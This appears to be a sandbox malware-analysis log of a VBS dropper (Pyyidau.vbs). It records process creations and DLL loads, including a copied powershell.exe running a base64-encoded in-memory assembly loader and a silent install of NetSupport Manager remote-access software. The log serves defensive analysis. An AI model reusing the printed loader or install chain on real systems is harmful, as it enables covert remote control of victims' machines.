                                Source: Pyyidau.vbsReversingLabs: Detection: 15%
                                Source: Pyyidau.vbsVirustotal: Detection: 25%
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile read: C:\Users\user\Desktop\Pyyidau.vbsJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI264F.tmp "C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2BE4.tmp "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI3FCC.tmp "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI51C1.tmp "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                Source: unknownProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850
                                Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3AJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI264F.tmp "C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6881B33184DF9141E848EAD78A411E72 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI2BE4.tmp "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EUJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI3FCC.tmp "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI51C1.tmp "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EIJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\Installer\MSI3FCC.tmpProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe winst64.exe /q /q /ex /i
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: C:\Windows\SysWOW64\cscript.exe "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49850
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: starttiledata.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: usermgrproxy.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeSection loaded: kernel.appcore.dllJump to behavior
